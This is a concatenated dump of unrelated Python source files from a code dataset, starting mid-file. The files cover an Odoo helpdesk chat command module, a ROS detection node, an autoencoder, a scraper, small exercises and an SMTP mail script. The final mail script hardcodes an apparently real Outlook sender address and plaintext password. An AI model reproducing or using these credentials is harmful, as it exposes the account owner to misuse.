super(SessionBasedLink, self)._teardown()\n\n def on_link_session_connected(self, event):\n self.on_session_connected(event.result, event.context)\n\n def on_link_session_disconnected(self, event):\n self.on_session_disconnected(event.handle, event.context)\n\n def on_session_connected(self, result, context):\n pass\n\n def on_session_disconnected(slef, handle, context):\n pass\n\n def on_heartbeat_event(self, event):\n self.heartbeat_strategy.on_heartbeat()\n","sub_path":"x2py/links/session_based_link.py","file_name":"session_based_link.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"144011725","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport re\nfrom odoo import api, fields, models, _\n\n\nclass HelpdeskTeam(models.Model):\n _inherit = ['helpdesk.team']\n\n feature_livechat_channel_id = fields.Many2one('im_livechat.channel', string='Live Chat Channel', compute='_get_livechat_channel', store=True)\n feature_livechat_web_page = fields.Char(related='feature_livechat_channel_id.web_page', string='Live Chat Test Page', readonly=True)\n is_canned_response = fields.Boolean()\n\n @api.depends('use_website_helpdesk_livechat')\n def _get_livechat_channel(self):\n LiveChat = self.env['im_livechat.channel']\n for team in self:\n if not team.feature_livechat_channel_id and team.name and team.use_website_helpdesk_livechat:\n channel = LiveChat.search([('name', '=', team.name)])\n if not channel:\n if team.member_ids:\n channel = LiveChat.create({'name': team.name, 'user_ids': [(6, _, team.member_ids.ids)]})\n else:\n channel = LiveChat.create({'name': team.name})\n team.feature_livechat_channel_id = channel\n\n\nclass MailChannel(models.Model):\n _inherit = 'mail.channel'\n\n # ------------------------------------------------------\n # Commands\n # ------------------------------------------------------\n\n def _define_command_helpdesk(self):\n return {'help': _(\"Create a new helpdesk ticket\")}\n\n def _execute_command_helpdesk(self, **kwargs):\n key = kwargs.get('body').split()\n partner = self.env.user.partner_id\n msg = _('Something is missing or wrong in command')\n channel_partners = self.env['mail.channel.partner'].search([('partner_id', '!=', partner.id), ('channel_id', '=', self.id)], limit=1)\n if key[0].lower() == '/helpdesk':\n if len(key) == 1:\n if self.channel_type == 'channel':\n msg = _(\"You are in channel #%s.\") % self.name\n if self.public == 'private':\n msg += _(\" This channel is private. People must be invited to join it.\")\n else:\n msg = _(\"You are in a private conversation with @%s.\") % channel_partners.partner_id.name\n msg += _(\"\"\"

\n You can create a new ticket by typing /helpdesk \"ticket title\".
\n You can search ticket by typing /helpdesk_search \"Keywords1 Keywords2 etc\"
\n \"\"\")\n else:\n list_value = key[1:]\n description = ''\n for message in self.channel_message_ids.sorted(key=lambda r: r.id):\n name = message.author_id.name or 'Anonymous'\n description += '%s: ' % name + '%s\\n' % re.sub('<[^>]*>', '', message.body)\n team = self.env['helpdesk.team'].search([('member_ids', 'in', self._uid)], order='sequence', limit=1)\n team_id = team.id if team else False\n helpdesk_ticket = self.env['helpdesk.ticket'].create({\n 'name': ' '.join(list_value),\n 'user_id': self.env.user.id,\n 'description': description,\n 'partner_id': channel_partners.partner_id.id,\n 'team_id': team_id,\n })\n link_ticket = ''+helpdesk_ticket.name+''\n msg = _(\"Created a new ticket and request: %s\") % link_ticket\n return self._send_transient_message(partner, msg)\n\n def _define_command_helpdesk_search(self):\n return {'help': _(\"Search for a helpdesk ticket\")}\n\n def _execute_command_helpdesk_search(self, **kwargs):\n key = kwargs.get('body').split()\n partner = self.env.user.partner_id\n msg = _('Something is missing or wrong in command')\n if key[0].lower() == '/helpdesk_search':\n if len(key) == 1:\n msg = _('You can search ticket by typing /helpdesk_search \"Keywords1 Keywords2 etc\"
')\n else:\n list_value = key[1:]\n Keywords = re.findall('\\w+', ' '.join(list_value))\n HelpdeskTag = self.env['helpdesk.tag']\n for Keyword in Keywords:\n HelpdeskTag |= HelpdeskTag.search([('name', 'ilike', Keyword)])\n tickets = self.env['helpdesk.ticket'].search([('tag_ids', 'in', HelpdeskTag.ids)], limit=10)\n if not tickets:\n for Keyword in Keywords:\n tickets |= self.env['helpdesk.ticket'].search([('name', 'ilike', Keyword)], order=\"id desc\", limit=10)\n if len(tickets) > 10:\n break\n if tickets:\n link_tickets = ['
#'+ticket.name+'' for ticket in tickets]\n msg = _('We found some matched ticket(s) related to the search query: %s') % ''.join(link_tickets)\n else:\n msg = _('No tickets found related to the search query.
make sure to use the right format: (/helpdesk_search Keyword1 Keyword2 etc...)')\n return self._send_transient_message(partner, msg)\n","sub_path":"website_helpdesk_livechat/models/helpdesk.py","file_name":"helpdesk.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420504461","text":"import itertools\nimport os\nimport shutil\nimport subprocess\n\ncells = ['tguv2']\n\n# lengths = ['100', '200', '500']\nlengths = ['100']\nnums = ['1', '2', '3']\n# lrates = ['0.01', '0.001', '0.0001']\nlrates = ['0.01', '0.1']\n\ngrid_iter = itertools.product(cells, lengths, nums, lrates)\n\nfor cell, length, num_items, lr in grid_iter:\n for i in range(5):\n results_dir = os.path.join(\n '../2017/variable_binding/longruns/noisy/tanh',\n '{}x{}'.format(length, num_items),\n cell,\n lr,\n '{}'.format(i))\n os.makedirs(results_dir)\n width = int(num_items)*10\n args = ['python',\n 'vbind.py',\n '--width={}'.format(width),\n '--rank={}'.format(width),\n '--task=continuous',\n '--inbetween_noise=True',\n '--batch_size=50',\n '--num_steps=25000',\n '--learning_rate={}'.format(lr),\n '--cell={}'.format(cell),\n '--sequence_length={}'.format(length),\n '--num_items={}'.format(num_items),\n '--results_dir={}'.format(results_dir)]\n subprocess.run(args, check=True)\n","sub_path":"vbind_runner.py","file_name":"vbind_runner.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162275031","text":"#!/usr/bin/env python\n\nimport rospy\nimport cv2\nimport numpy as np\n# from std_msgs.msg import String, Int16, Header\nfrom obj_detector.srv import items, itemsResponse\nfrom geometry_msgs.msg import Point, Quaternion, PoseStamped, Pose\nfrom sensor_msgs.msg import CompressedImage, PointCloud2\nfrom nav_msgs.msg import Odometry\nimport sensor_msgs.point_cloud2 as pc2\nfrom obj_detector.msg import Detection_msg\nfrom ar_track_alvar_msgs.msg import AlvarMarkers, AlvarMarker\nimport tf2_ros\nimport tf2_geometry_msgs\nimport copy\nimport string\n\n# --------------------------description---------------------- /\n# This script is a serviec that gets names of items, then if it detect\n# one of them its publish PoseStamped and image with the dot in the item center.\n# The PoseStamped are publish at 2 different topic according to the detect object.\n# One topic for pick (cup, bottle) second topic for cup deliver to person.\n# For intput '' the servie stop, for input like 'cup,bottle' the service publish\n# alvar marker of cup or bottle in the pick up matker topic.\n# Additionaly this script include KLF that estimate the object location\n\n\npointcloud_topic = '/kinect2/qhd/points'\ncamera_topic = '/kinect2/qhd/image_color_rect/compressed'\ndetect_topic = '/yolo4_result/detections'\npick_markers_publish_topic = '/detected_objects'\nperson_markers_publish_topic = \"/detected_objects_person\"\nimg_publish_topic = '/yolo4_result/obj_pick/compressed'\n\n\nclass pointcloud():\n def __init__(self):\n # self.data = PointCloud2()\n rospy.Subscriber(pointcloud_topic, PointCloud2, self.listener)\n\n def listener(self, msg):\n self.data = msg\n\n\nclass KLF_alvarMarker():\n def __init__(self):\n self.odom = rospy.wait_for_message('/mobile_base_controller/odom', Odometry).twist.twist\n rospy.Subscriber('/mobile_base_controller/odom', Odometry, self.odom_cb, queue_size=1)\n self.dt = 0.01\n rospy.Timer(rospy.Duration(self.dt), self.predict)\n self.x = 0.\n self.y = 0.\n self.x_dot = 0\n self.y_dot = 0\n self.x_vec = np.array([[self.x], [self.y]], dtype=np.float32) # , self.x_dot, self.y_dot)\n self.p = np.zeros((2, 2))\n self.q = np.eye((2))*0.1\n self.r = np.eye((2))*0.01\n\n def odom_cb(self, msg):\n self.odom = msg.twist.twist\n\n def predict(self, event):\n temp = self.x_vec[0] if self.x_vec[0] != 0 else 10e5\n F = np.array([[1-self.dt*self.odom.linear.x/temp, 0],\n [-self.dt*self.odom.angular.z, 1]], dtype=np.float32)\n\n self.x_vec = np.matmul(F, self.x_vec) # Predicted state estimate\n self.p = np.linalg.multi_dot([F, self.p, F.T]) + self.q # Predicted estimate covariance\n # print(self.x_vec)\n\n def update(self, observe):\n observe_vec = np.array([[observe.pose.position.x], [observe.pose.position.y]])\n y_vec = observe_vec - self.x_vec\n s = self.p + self.r\n k = self.p.dot(np.linalg.inv(s))\n self.x_vec = self.x_vec + k.dot(y_vec)\n self.p = (np.eye(2)-k).dot(self.p)\n self.p = np.linalg.multi_dot([(np.eye(2)-k), self.p, (np.eye(2)-k).T]) + np.linalg.multi_dot([k, self.r, k.T])\n\n\nclass Alvar_markers():\n def __init__(self, publisher):\n self.data = AlvarMarkers()\n self.data.markers = [AlvarMarker(), AlvarMarker()]\n self.pub = publisher\n self.data.markers[0].id = 1\n\n self.data.markers[1].id = 2\n self.data.header.frame_id = 'base_footprint'\n self.last_update = rospy.Time.now()\n self._timer = rospy.Timer(rospy.Duration(0.2), self.publish)\n\n def update(self, pose_transformed, score):\n self.data.header.stamp = rospy.Time.now()\n self.last_update = rospy.Time.now()\n self.data.markers[0].pose = pose_transformed\n self.data.markers[0].header.stamp = rospy.Time.now()\n self.data.markers[0].header.frame_id = self.data.header.frame_id\n self.data.markers[0].confidence = score\n self.data.markers[0].pose.pose.position.z += 0.0\n self.data.markers[0].pose.pose.orientation = Quaternion(0, 0, 0, 1)\n\n self.data.markers[1].pose = copy.deepcopy(pose_transformed)\n self.data.markers[1].header.stamp = rospy.Time.now()\n self.data.markers[1].header.frame_id = self.data.header.frame_id\n self.data.markers[1].confidence = score\n self.data.markers[1].pose.pose.position.z -= 0.08\n self.data.markers[1].pose.pose.orientation = Quaternion(0, 0, 0, 1)\n\n def predict(self):\n global estimator, pub_img, kinect2_img\n predict_pose = PoseStamped()\n predict_pose.pose.position.x = estimator.x_vec[0]\n predict_pose.pose.position.y = estimator.x_vec[1]\n predict_pose.header.frame_id = 'base_footprint'\n predict_pose.pose.position.z = self.data.markers[0].pose.pose.position.z\n self.update(predict_pose, 0.1)\n compress_image = createCompresseImage(kinect2_img)\n pub_img.publish(compress_image)\n\n def publish(self, event):\n if ((rospy.Time.now() - self.last_update).to_sec > 0.5):\n self.predict()\n self.pub.publish(self.data)\n\n\ndef img_listner(msg):\n global kinect2_img\n img_cv2 = np.fromstring(msg.data, np.uint8)\n kinect2_img = cv2.imdecode(img_cv2, cv2.IMREAD_COLOR)\n\n\ndef createCompresseImage(cv2_img):\n msg = CompressedImage()\n msg.header.stamp = rospy.Time.now()\n msg.format = \"jpeg\"\n msg.data = np.array(cv2.imencode('.jpg', cv2_img)[1]).tostring()\n return msg\n\n\ndef publish_image(stamp_pose, detection):\n global kinect2_img, pub_img\n frame = kinect2_img\n [x, y] = [int(detection.pose.x_center), int(detection.pose.y_center)]\n cv2.circle(frame, (x, y), radius=3, color=(0, 0, 255), thickness=-5)\n cv2.putText(frame, detection.class_id, (x+10, y), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\n compress_image = createCompresseImage(frame)\n pub_img.publish(compress_image)\n\n\ndef list_2_stampPose(location):\n pose = Point(location[0], location[1], location[2])\n input_pose = PoseStamped()\n input_pose.pose.position = pose\n input_pose.pose.orientation.w = 1\n input_pose.header.stamp = rospy.Time.now()\n input_pose.header.frame_id = 'kinect2_depth_optical_frame'\n return input_pose\n\n\ndef detection_cb(msg, items_list, point_cloud_data):\n global kinect2_img, tf_buffer, estimator\n if not items_list:\n pass\n elif msg.class_id in items_list:\n [u, v] = [int(msg.pose.x_center), int(msg.pose.y_center)]\n # location type --> [(touple)]\n location_xyz = list(pc2.read_points(point_cloud_data.data, ('x', 'y', 'z'), skip_nans=True, uvs=[[u, v]]))\n if location_xyz:\n converted_location = list_2_stampPose(location_xyz[0])\n transform = tf_buffer.lookup_transform('base_footprint',\n converted_location.header.frame_id, # source frame\n rospy.Time(0), # get the tf at first available time\n rospy.Duration(1.0)) # wait for 1 second\n pose_transformed = tf2_geometry_msgs.do_transform_pose(converted_location,\n transform)\n alvar_marker.update(pose_transformed, msg.score)\n estimator.update(pose_transformed)\n publish_image(converted_location, msg)\n\n\ndef item_cb(msg):\n global items_list, alvar_marker, estimator\n msg.items = ''.join(filter(lambda c: c in string.printable, msg.items))\n items_list = msg.items.split(\",\")\n if '' in items_list:\n # alvar_marker.pub.unregister()\n # rospy.time.Timer.shotdown()\n if alvar_marker:\n alvar_marker._timer._shutdown = True\n del alvar_marker\n del estimator\n alvar_marker = False\n estimator = False\n return itemsResponse(False)\n estimator = KLF_alvarMarker()\n if 'person' in items_list:\n alvar_marker = Alvar_markers(person_pub_markers)\n else:\n alvar_marker = Alvar_markers(pick_pub_markers)\n return itemsResponse(True)\n\n\ndef main():\n point_cloud_data = pointcloud()\n global tf_buffer, tf_listener, pub_img, pick_pub_markers, person_pub_markers, estimator, items_list, alvar_marker\n items_list = []\n alvar_marker = False\n estimator = False\n rospy.Service('alvar_marker_service', items, item_cb)\n pick_pub_markers = rospy.Publisher(pick_markers_publish_topic, AlvarMarkers,\n queue_size=10)\n person_pub_markers = rospy.Publisher(person_markers_publish_topic, AlvarMarkers,\n queue_size=10)\n pub_img = rospy.Publisher(img_publish_topic, CompressedImage, queue_size=1)\n # pose_pub = rospy.Publisher('/find_objects_node/object_pose', PoseStamped, queue_size= 1)\n\n tf_buffer = tf2_ros.Buffer()\n tf_listener = tf2_ros.TransformListener(tf_buffer)\n\n rospy.Subscriber(camera_topic, CompressedImage, img_listner, queue_size=1)\n rospy.wait_for_message(camera_topic, CompressedImage)\n detection_cb_lambda = lambda data: detection_cb(data, items_list, point_cloud_data)\n\n rospy.Subscriber(detect_topic, Detection_msg, detection_cb_lambda, queue_size=15)\n rospy.wait_for_message(detect_topic, Detection_msg)\n\n rospy.spin()\n\n\nif __name__ == '__main__':\n rospy.init_node('alvar_marker_pub', anonymous=True)\n main()\n","sub_path":"scripts/alvar_markers_pub.py","file_name":"alvar_markers_pub.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321132181","text":"# -*- coding: utf-8 -*-\nimport sys\n\n\ndef get_ordinal_list(limit):\n if not isinstance(limit, int):\n raise ValueError('Limit argument must be an integer')\n\n if limit not in range(1, 11):\n raise ValueError('Limit argument must be in range from 1 to 10')\n\n ordianls = []\n ordianls += ['first', 'second', 'third', 'thourth', 'fifth']\n ordianls += ['sixth', 'seventh', 'eighth', 'ninth', 'tenth']\n\n return ordianls[0:limit]\n\n\ndef phrase_save(attempts=1):\n max_attempts_count = 10\n\n if not isinstance(attempts, int):\n raise ValueError('Attemts argument must be an integer')\n\n if attempts not in range(1, max_attempts_count + 1):\n raise ValueError('Attempts argument must be in range from 1 to 10')\n\n ordinal_phrase_prefixes = get_ordinal_list(max_attempts_count)\n\n f = open('../out/phrase_save.txt', 'a')\n\n attempt_counter = 0\n\n while attempt_counter < attempts:\n try:\n phrase = input('Input phrase: ')\n except KeyboardInterrupt:\n break\n\n if (phrase == ''):\n break\n\n write_str = '{} phrase: {}'.format(ordinal_phrase_prefixes[attempt_counter].capitalize(), phrase[::-1])\n print(write_str, file=f)\n\n attempt_counter += 1\n\n print('\\nThank you...')\n\n f.close()\n\n\ndef main():\n if len(sys.argv) > 1:\n try:\n attempts = int(sys.argv[1])\n except ValueError as e:\n attempts = 3\n finally:\n phrase_save(attempts)\n else:\n phrase_save()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lesson7/save_phrase.py","file_name":"save_phrase.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"82192101","text":"import re\nimport logging\n\nfrom collections import defaultdict\n\nfrom flask import render_template\n\nlogger = logging.getLogger(\"quoted-forsooth.utils\")\n\ndef natural_key(string_):\n \"\"\"See http://www.codinghorror.com/blog/archives/001018.html\"\"\"\n return [int(s) if s.isdigit() else s for s in re.split(r'(\\d+)', str(string_))]\n\ndef collect_metadata(text, just_the_facts=False, include_div=False):\n if text is None:\n if just_the_facts:\n return {}\n else:\n return None\n metadict = defaultdict(list)\n def _collect_metadata(match):\n submatch = re.fullmatch(r\"<<(?P.+?): (?P.+?)>>\", match.group(0))\n try:\n metadict[submatch.group('key')].append(submatch.group('value'))\n return ''\n except Exception:\n return match.group(0)\n\n r = r\"<<.+?: .+?>>\"\n new_text = re.sub(r, _collect_metadata, text)\n if just_the_facts:\n return metadict\n if include_div:\n div = render_template('userMetadata.div.html', metadata=metadict)\n new_text = div + new_text\n return new_text\n\ndef printable(text):\n if not text:\n return ''\n parsers = [\n collect_metadata,\n ]\n for p in parsers:\n text = p(text)\n return text\n\ndef toggle_checkbox(text, number, item_text):\n new_lines = []\n start_regex = re.compile(r\"```(?:CHECKLIST|checklist)(?: (.+))?$\")\n end_regex = re.compile(r\"```$\")\n cl_regex = re.compile(r\"(-|X) (.+)$\")\n checklist_mode = False\n checkboxes = 0\n for line in text.splitlines():\n if not checklist_mode:\n start_match = start_regex.fullmatch(line)\n if start_match:\n checklist_mode = True\n new_lines.append(line)\n continue\n else:\n new_lines.append(line)\n continue\n else:\n end_match = end_regex.fullmatch(line)\n if end_match:\n new_lines.append(line)\n checklist_mode = False\n continue\n else:\n # this should be a checklist item\n cl_match = cl_regex.fullmatch(line)\n if cl_match:\n checkboxes = checkboxes + 1\n item = cl_match.group(2)\n if checkboxes == number and item_text == item:\n # This is reversing the checked state!\n checked = '-' if (cl_match.group(1) == \"X\") else 'X'\n new_text = checked + line[1:]\n new_lines.append(new_text)\n else:\n new_lines.append(line)\n else:\n new_lines.append(line)\n return '\\n'.join(new_lines)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491150387","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 18, \"normal\")\nGO_FONT = (\"Courier\", 30, \"normal\")\n\n\nclass ScoreBoard(Turtle):\n def __init__(self):\n super().__init__()\n self.score = 0\n self.lives = 3\n self.color(\"white\")\n self.hideturtle()\n self.penup()\n\n def update_score(self):\n self.goto(300,-250)\n self.write(f\"Score: {self.score}\", align=\"left\", font=FONT)\n\n def update_lives(self):\n self.goto(300,-220)\n self.write(f\"Lives: {self.lives}\", align=\"left\", font=FONT)\n\n def increase_score(self):\n self.clear()\n self.score += 1\n self.goto(300,-250)\n self.write(f\"Score: {self.score}\", align=\"left\", font=FONT)\n\n def decrease_lives(self):\n self.clear()\n self.lives -= 1\n self.goto(300,-220)\n self.write(f\"Lives: {self.lives}\", align=\"left\", font=FONT)\n\n def game_over(self):\n self.goto(0,0)\n self.write(\"GAME OVER\", align=\"center\", font=GO_FONT)\n","sub_path":"scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"648873369","text":"# -*- coding: utf-8 -*-\nimport logging\nimport pickle\nfrom pathlib import Path\n\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport keras.backend as K\nfrom keras.layers import Input, Embedding, Dense, SpatialDropout1D, LSTM\nfrom keras.layers import RepeatVector, TimeDistributed\nimport keras.layers as L\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\nfrom pipeline.utility import unpack_data_dict\n\ndef build_autoencoder(verbose=False, compile=True):\n \"\"\" Build VAE model.\"\"\"\n\n MAXLEN = 220 # Is it worth directly inferring this from the training data? Probably.\n path = project_dir + '/data/processed/word_index.pkl'\n with open(path, 'rb') as f:\n word_index = pickle.load(f)\n print(f\"Word index length: {len(word_index)}\")\n path = project_dir + '/data/processed/embedding_matrix.pkl'\n with open(path, 'rb') as f:\n embedding_matrix = pickle.load(f)\n print(f\"Embedding matrix shape: {embedding_matrix.shape}\")\n\n inputs = Input(shape=(MAXLEN,), dtype='int32')\n embedding_layer = Embedding(input_dim=len(word_index) ,\n output_dim=300,\n weights=[embedding_matrix],\n input_length=MAXLEN,\n trainable=False)\n\n embedded_text = embedding_layer(inputs)\n #embedded_text = Embedding(,128\n x = LSTM(300)(embedded_text)\n #x = SpatialDropout1D(0.2)(x)\n encoded = RepeatVector(100)(x)\n decoded = LSTM(300, return_sequences=True)(encoded)\n outputs = TimeDistributed(Dense(len(word_index), activation='softmax'))(decoded)\n #x = Dense( , activation='relu')(x)\n\n model = Model(inputs, outputs)\n if verbose:\n model.summary()\n if compile:\n model.compile(loss='categorical_crossentropy', \n optimizer=Adam(0.005),\n metrics=[])\n return model\n\ndef train_model(model, data):\n \"\"\" \"\"\"\n n_splits = 5\n BATCH_SIZE = 512\n NUM_EPOCHS = 3\n\n X_train, y_train, X_test, y_test = unpack_data_dict(data)\n\n splits = list(KFold(n_splits=n_splits).split(X_train, y_train))\n\n oof_preds = np.zeros((X_train.shape[0]))\n test_preds = np.zeros((X_test.shape[0]))\n #TODO modify all of this as appropriate for seq2seq_autoencoder \n for fold in range(n_splits):\n K.clear_session()\n train_index, val_index = splits[fold]\n checkpoint = ModelCheckpoint(f\"seq2eq_ae_{fold}.hdf5\", \n save_best_only=True)\n early_stopping = EarlyStopping(monitor='val_loss',\n mode='min',\n verbose=1,\n patience=3)\n model.fit(X_train[train_index],\n y_train[train_index]>0.5,\n batch_size=BATCH_SIZE,\n epochs=NUM_EPOCHS,\n validation_data=(X_train[val_index], y_train[val_index]>0.5),\n callbacks=[early_stopping, checkpoint])\n oof_preds[val_index] += model.predict(X_train[val_index])[:,0]\n test_preds += model.predict(X_test)[:,0]\n test_preds /= 5\n\n\ndef main(project_dir):\n \"\"\" \n \"\"\"\n logger = logging.getLogger(__name__)\n\n path = project_dir + '/data/processed/data_tokenize.pkl'\n logging.info(f\"Loading tokenized data from {path}\")\n with open(path, 'rb') as f:\n data = pickle.load(f) \n autoencoder = build_autoencoder(verbose=True)\n train_model(autoencoder, data)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s-%(levelname)s: %(message)s'\n date_fmt = '%Y%m%d %H:%M:%S'\n logging.basicConfig(level=logging.INFO, format=log_fmt, datefmt=date_fmt)\n\n project_dir = str(Path(__file__).resolve().parents[2])\n\n main(project_dir)\n","sub_path":"src/models/seq2seq_autoencoder.py","file_name":"seq2seq_autoencoder.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42354955","text":"# https://www.hackerrank.com/challenges/detect-html-tags-attributes-and-attribute-values/problem\n\nfrom html.parser import HTMLParser\n\nclass MyHTMLParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n print(tag)\n if attrs:\n self.print_attrs(attrs)\n def handle_endtag(self, tag):\n pass\n def handle_startendtag(self, tag, attrs):\n print(tag)\n if attrs:\n self.print_attrs(attrs)\n def print_attrs(self, attrs):\n if not attrs:\n return\n for attr in attrs:\n print('->', attr[0], '>', attr[1])\n\nif __name__ == '__main__':\n n = int(input())\n my_html_parser = MyHTMLParser()\n for _ in range(n):\n my_html_parser.feed(input().strip())\n","sub_path":"hackerrank/python/regex_and_parsing/detect_html_tags_attributes_and_attribute_values.py","file_name":"detect_html_tags_attributes_and_attribute_values.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"1686816","text":"from bs4 import BeautifulSoup as bs\nimport requests, os, re\nfrom urllib.request import urlretrieve\n\nhtml = requests.get(\"https://comic.naver.com/webtoon/weekday.nhn\")\nsoup = bs(html.text, \"html.parser\")\nhtml.close()\n\ntry:\n if not os.path.isdir(\"./images\"):\n os.mkdir(os.path.join(\"./images\"))\nexcept OSError as e:\n print(\"Error 폴더생성 실패!!\")\n exit()\n\ndatas = soup.select(\"div.list_area li div.thumb a img\")\nfor data in datas:\n title = data[\"title\"]\n src = data[\"src\"]\n title = re.sub(\"[^0-9a-zA-Zㄱ-힗]\", \"\", title) # 해당 영역의 글자가 아니 것은 ''로 치환시킨다.\n urlretrieve(src, f\"./images/{title}.jpg\") # 주소, 파일경로+파일명+확장자\n # print(f\"title: {title}\\tsrc: {src} \")\n # urlretrieve(title, f\"./images/{src}.jpg\")\n","sub_path":"basic/p04.py","file_name":"p04.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"300225708","text":"#!/usr/bin/env python\nimport os\ntry:\n from cache import main\nexcept ImportError:\n from .cache import main\n\ndram_multiplier = 1\nstore_to_cache = True\nkernels = ['rot']\n# kernels = ['rot', 'hflip', 'vflip']\n\nbatch_sizes = [1, 2, 4, 8, 16, 32, 64]\nsizes = [100, 250]\n\nl1_sizes = [2**n for n in range(12, 16)] # note 2**15 = 32768\ndegrees_of_associativity = [1]\nrows_of_parallelism = [1, 4, 8]\nresults_dir = 'results/new-batch-size-test'\n# os.mkdir(results_dir)\n\nfor size in sizes:\n for n_images in batch_sizes:\n for kernel in kernels:\n print('\\n' + '='*25 + '\\n' + kernel + '\\n' + '='*25 + '\\n')\n\n # create output filename\n out_basename = kernel + '_%sx%s' % (n_images, size) + '.csv'\n if store_to_cache:\n out_basename = 'store2cache_' + out_basename\n out_filename = os.path.join(results_dir, out_basename)\n\n results = 'time per pixel (ns),energy per pixel (nJ),rows,ways,l1_size\\n'\n for rows in rows_of_parallelism:\n for l1_size in l1_sizes:\n break_now = False\n for ways in degrees_of_associativity:\n\n config = \"rows=%s, ways=%s; l1_size=%s\" % (rows, ways, l1_size)\n print(config)\n try:\n time_pp, energy_pp = main(kernel=kernel,\n image_size=size,\n n_images=n_images,\n l1_ways=ways,\n l2_ways=ways,\n l1_block_size=64,\n l2_block_size=64,\n l1_size=l1_size,\n l2_size=2097152,\n parallelism=rows,\n store_to_cache=store_to_cache,\n dram_multiplier=dram_multiplier,\n verbose=False)\n except Exception as e:\n time_pp, energy_pp = 'error', 'error'\n print(\"Exception encountered w/ config=%s\\nException:\\n%s\"\n \"\" % (config, e))\n break_now = True\n if break_now:\n break\n\n results += ('%s,%s,%s,%s,%s\\n'\n '' % (time_pp, energy_pp, rows, ways, l1_size))\n\n with open(out_filename, 'w+') as f:\n f.write(results)\n","sub_path":"run_cache_experiment2b.py","file_name":"run_cache_experiment2b.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"90851363","text":"import os\nimport shutil\nfrom tqdm import tqdm\n\nfrom get_codes import get_files_with_code\n\n\ndef zip_student_folders(path='.'):\n # Path can be given in case it is not executing \n\t# from directory where are the files to be zipped\n if path != '.':\n os.chdir(path)\n # calling function to get all file paths in the directory\n file_paths = tqdm(get_files_with_code())\n\n # printing the list of all files to be zipped\n print('Following files will be zipped:')\n for file_name in file_paths:\n file_paths.set_description('Compressing: {:<20}'.format(file_name))\n shutil.make_archive(file_name, 'zip', file_name)\n\n print('All files zipped successfully!')\n\n\nif __name__ == \"__main__\":\n zip_student_folders()\n","sub_path":"to_zip.py","file_name":"to_zip.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539863736","text":"#!/usr/bin/env python\n\"\"\"\nSends a email.\n\nAuthor: Javier Arellano-Vertdejo (J@Vo)\nDate: October 2018\nVersion: v1.311.18\n\"\"\"\nimport argparse\nimport smtplib\nimport sys\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\n\n\n# sender parameters\nSMTP_SERVER = 'smtp-mail.outlook.com'\nSMTP_PORT = 587\nSMTP_SENDER = 'akbal.ecosur@outlook.com'\nSMTP_PASSWORD = \"a1k2b3a4l5\"\n\n\ndef sendMail(mail_subject, mail_to, mail_message):\n \"\"\"\n Send a email message.\n\n @params:\n mail_subject - Required : subject of mail\n mail_to - Required : dest of mail\n mail_message - Required : message of mail\n \"\"\"\n msg = MIMEMultipart()\n msg['Subject'] = mail_subject\n msg['To'] = mail_to\n msg['From'] = SMTP_SENDER\n\n part = MIMEText('text', \"plain\")\n part.set_payload(mail_message)\n msg.attach(part)\n\n # sets parameters to send email\n session = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\n session.ehlo()\n session.starttls()\n session.ehlo\n\n # login using sender parameters\n session.login(SMTP_SENDER, SMTP_PASSWORD)\n qwertyuiop = msg.as_string()\n\n # sends email\n session.sendmail(SMTP_SENDER, mail_to, qwertyuiop)\n\n # close session\n session.quit()\n\n\ndef main(argv):\n \"\"\"\n Call the process function with the parameter list.\n\n @params:\n argv - Required : command line argument list (List)\n \"\"\"\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-s\", \"--subject\", required=True,\n help=\"subject of mail\")\n ap.add_argument(\"-t\", \"--to\", required=True,\n help=\"dest\")\n ap.add_argument(\"-m\", \"--message\", required=True,\n help=\"message of mail\")\n\n args = vars(ap.parse_args())\n\n mail_subject = args['subject']\n mail_to = args['to']\n mail_message = args['message']\n\n # send the email\n sendMail(mail_subject, mail_to, mail_message)\n\n\nif __name__ == '__main__':\n \"\"\"\n Use example.\n\n sendmail.py -s \"subject\" -t \"javier.arellano@mail.ecosur.mx\" -m \"message\"\n \"\"\"\n 